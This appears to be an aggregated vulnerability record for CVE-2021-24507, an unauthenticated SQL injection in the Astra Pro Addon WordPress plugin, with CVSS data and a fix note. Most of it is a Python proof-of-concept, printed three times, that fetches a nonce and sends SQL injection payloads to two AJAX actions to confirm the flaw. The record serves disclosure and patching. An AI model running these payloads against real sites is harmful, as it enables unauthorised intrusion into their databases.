Description
The plugin did not properly sanitise or escape some of the POST parameters of the astra_pagination_infinite and astra_shop_pagination_infinite AJAX actions (available to both unauthenticated and authenticated users) before using them in SQL statements, leading to SQL Injection issues.
Related
{"id": "WPEX-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection", "description": "The plugin did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues\n", "published": "2021-07-08T00:00:00", "modified": "2021-08-10T07:14:51", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Ngoc Nguyen", "references": ["https://wpastra.com/changelog/astra-pro-addon/"], "cvelist": ["CVE-2021-24507"], "immutableFields": [], "lastseen": "2021-09-14T23:15:07", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24507"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24507"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceData": "Via astra_pagination_infinite action:\r\n\r\nimport argparse\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup as bs\r\nimport json\r\n\r\nreq.urllib3.disable_warnings()\r\n\r\ndef get_nonce(url):\r\n\r\n\ttry:\r\n\t\theaders = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", 
\"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\r\n\t\tr = req.get(url, headers=headers, allow_redirects=True, verify=False)\r\n\t\tif 'var astra = {' in r.text and 'infinite_nonce' in r.text:\r\n\r\n\t\t\tsoup = bs(r.content, 'html.parser')\r\n\t\t\tastra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1]\r\n\t\t\tdata = json.loads(astra)\r\n\t\t\tnonce = data['infinite_nonce']\r\n\r\n\t\t\treturn nonce, r.url\r\n\texcept Exception as e:\r\n\t\t#raise e\r\n\t\treturn None, None\r\n\r\n\treturn None, None\r\n\r\n\r\ndef send_request(url, nonce, payload):\r\n\r\n\tdata = {\r\n\t\t\"action\": \"astra_pagination_infinite\",\r\n\t\t\"page_no\": \"1\", \r\n\t\t\"nonce\": \"{}\".format(nonce), \r\n\t\t\"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \r\n\t\t\"astra_infinite\": \"astra_pagination_ajax\"\r\n\t\t}\r\n\r\n\theaders = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"}\t\r\n\r\n\turl += '/wp-admin/admin-ajax.php'\r\n\tr = req.post(url, headers=headers, data=data, 
verify=False)\r\n\treturn r.text\r\n\r\n\r\ndef check_sqli(url, nonce):\r\n\t\r\n\t# grep error base\r\n\tres = send_request(url, nonce, \"'\")\r\n\tif 'database error' in res:\r\n\t\treturn True, 'Vuln to Error-Based.'\r\n\r\n\r\n\t# query 1\r\n\tres1 = send_request(url, nonce, '9656)) and ((7556=1223')\r\n\tres2 = send_request(url, nonce, '9634)) or ((6532=6532')\r\n\r\n\tif res1 == '' and (len(res2) > len(res1)):\r\n\t\treturn True, 'Vuln to Boolean-Based.'\r\n\r\n\r\n\treturn False, 'Not vuln'\t\t\r\n\r\n\r\ndef main():\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\")\r\n\targs = parser.parse_args()\r\n\turl = args.url\r\n\r\n\tnonce, r_url = get_nonce(url)\r\n\tprint(check_sqli(r_url, nonce)[1])\r\n\r\n\r\nmain()\r\n\r\n\r\nVia astra_shop_pagination_infinite action:\r\n\r\nimport argparse\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup as bs\r\nimport json\r\n\r\nreq.urllib3.disable_warnings()\r\n\r\ndef get_nonce(url):\r\n\r\n\ttry:\r\n\t\theaders = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\r\n\t\tr = req.get(url, headers=headers, allow_redirects=True, verify=False)\r\n\t\tif 'var astra = {' in r.text and 'shop_infinite_nonce' in r.text:\r\n\r\n\t\t\tsoup = bs(r.content, 'html.parser')\r\n\t\t\tastra = soup.find('script', attrs={'id': 
'astra-theme-js-js-extra'}).text.strip()[12:-1]\r\n\t\t\tdata = json.loads(astra)\r\n\t\t\tnonce = data['shop_infinite_nonce']\r\n\r\n\t\t\treturn nonce, r.url\r\n\texcept Exception as e:\r\n\t\t#raise e\r\n\t\treturn None, None\r\n\r\n\treturn None, None\r\n\r\n\r\ndef send_request(url, nonce, payload):\r\n\r\n\tdata = {\r\n\t\t\"action\": \"astra_shop_pagination_infinite\",\r\n\t\t\"page_no\": \"1\", \r\n\t\t\"nonce\": \"{}\".format(nonce), \r\n\t\t\"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \r\n\t\t\"astra_infinite\": \"astra_pagination_ajax\"\r\n\t\t}\r\n\r\n\theaders = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"}\t\r\n\r\n\turl += '/wp-admin/admin-ajax.php'\r\n\tr = req.post(url, headers=headers, data=data, verify=False)\r\n\treturn r.text\r\n\r\n\r\ndef check_sqli(url, nonce):\r\n\t\r\n\t# grep error base\r\n\tres = send_request(url, nonce, \"'\")\r\n\tif 'database error' in res:\r\n\t\treturn True, 'Vuln to Error-Based.'\r\n\r\n\r\n\t# query 1\r\n\tres1 = send_request(url, nonce, '9656)) and ((7556=1223')\r\n\tres2 = send_request(url, nonce, '9634)) or ((6532=6532')\r\n\r\n\tif res1 == '' and (len(res2) > len(res1)):\r\n\t\treturn True, 'Vuln to Boolean-Based.'\r\n\r\n\r\n\treturn 
False, 'Not vuln'\t\t\r\n\r\n\r\ndef main():\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\")\r\n\targs = parser.parse_args()\r\n\turl = args.url\r\n\r\n\tnonce, r_url = get_nonce(url)\r\n\tprint(check_sqli(r_url, nonce)[1])\r\n\r\n\r\nmain()", "generation": 0, "_state": {"dependencies": 1646269721}}
{"cve": [{"lastseen": "2022-03-23T14:56:02", "description": "The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T10:15:00", "type": "cve", "title": "CVE-2021-24507", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24507"], "modified": "2021-08-17T16:41:00", "cpe": [], "id": "CVE-2021-24507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24507", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-09-14T23:15:07", "description": "The plugin did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL 
statement, leading to an SQL Injection issues\n\n### PoC\n\nVia astra_pagination_infinite action: import argparse import requests as req from bs4 import BeautifulSoup as bs import json req.urllib3.disable_warnings() def get_nonce(url): try: headers = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"} r = req.get(url, headers=headers, allow_redirects=True, verify=False) if 'var astra = {' in r.text and 'infinite_nonce' in r.text: soup = bs(r.content, 'html.parser') astra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1] data = json.loads(astra) nonce = data['infinite_nonce'] return nonce, r.url except Exception as e: #raise e return None, None return None, None def send_request(url, nonce, payload): data = { \"action\": \"astra_pagination_infinite\", \"page_no\": \"1\", \"nonce\": \"{}\".format(nonce), \"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \"astra_infinite\": \"astra_pagination_ajax\" } headers = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": 
\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"} url += '/wp-admin/admin-ajax.php' r = req.post(url, headers=headers, data=data, verify=False) return r.text def check_sqli(url, nonce): # grep error base res = send_request(url, nonce, \"'\") if 'database error' in res: return True, 'Vuln to Error-Based.' # query 1 res1 = send_request(url, nonce, '9656)) and ((7556=1223') res2 = send_request(url, nonce, '9634)) or ((6532=6532') if res1 == '' and (len(res2) > len(res1)): return True, 'Vuln to Boolean-Based.' return False, 'Not vuln' def main(): parser = argparse.ArgumentParser() parser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\") args = parser.parse_args() url = args.url nonce, r_url = get_nonce(url) print(check_sqli(r_url, nonce)[1]) main() Via astra_shop_pagination_infinite action: import argparse import requests as req from bs4 import BeautifulSoup as bs import json req.urllib3.disable_warnings() def get_nonce(url): try: headers = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", 
\"Connection\": \"close\"} r = req.get(url, headers=headers, allow_redirects=True, verify=False) if 'var astra = {' in r.text and 'shop_infinite_nonce' in r.text: soup = bs(r.content, 'html.parser') astra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1] data = json.loads(astra) nonce = data['shop_infinite_nonce'] return nonce, r.url except Exception as e: #raise e return None, None return None, None def send_request(url, nonce, payload): data = { \"action\": \"astra_shop_pagination_infinite\", \"page_no\": \"1\", \"nonce\": \"{}\".format(nonce), \"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \"astra_infinite\": \"astra_pagination_ajax\" } headers = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"} url += '/wp-admin/admin-ajax.php' r = req.post(url, headers=headers, data=data, verify=False) return r.text def check_sqli(url, nonce): # grep error base res = send_request(url, nonce, \"'\") if 'database error' in res: return True, 'Vuln to Error-Based.' # query 1 res1 = send_request(url, nonce, '9656)) and ((7556=1223') res2 = send_request(url, nonce, '9634)) or ((6532=6532') if res1 == '' and (len(res2) > len(res1)): return True, 'Vuln to Boolean-Based.' 
return False, 'Not vuln' def main(): parser = argparse.ArgumentParser() parser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\") args = parser.parse_args() url = args.url nonce, r_url = get_nonce(url) print(check_sqli(r_url, nonce)[1]) main()\n", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "wpvulndb", "title": "Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24507"], "modified": "2021-08-10T07:14:51", "id": "WPVDB-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C", "href": "https://wpscan.com/vulnerability/a1a0dc0b-c351-4d46-ac9b-b297ce4d251c", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:33", "description": "Unauthenticated SQL Injection (SQLi) vulnerability discovered by Ngoc Nguyen in WordPress Astra Pro premium plugin (versions <= 3.5.1).\n\n## Solution\n\n\r\n Update the WordPress Astra Pro premium plugin to the latest available version (at least 3.5.2).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T00:00:00", "type": "patchstack", "title": "WordPress Astra Pro premium plugin <= 3.5.1 - Unauthenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24507"], "modified": "2021-07-08T00:00:00", "id": "PATCHSTACK:7DC3B805F67FF4143ED4520C27954328", "href": "https://patchstack.com/database/vulnerability/astra-addon/wordpress-astra-pro-premium-plugin-3-5-1-unauthenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}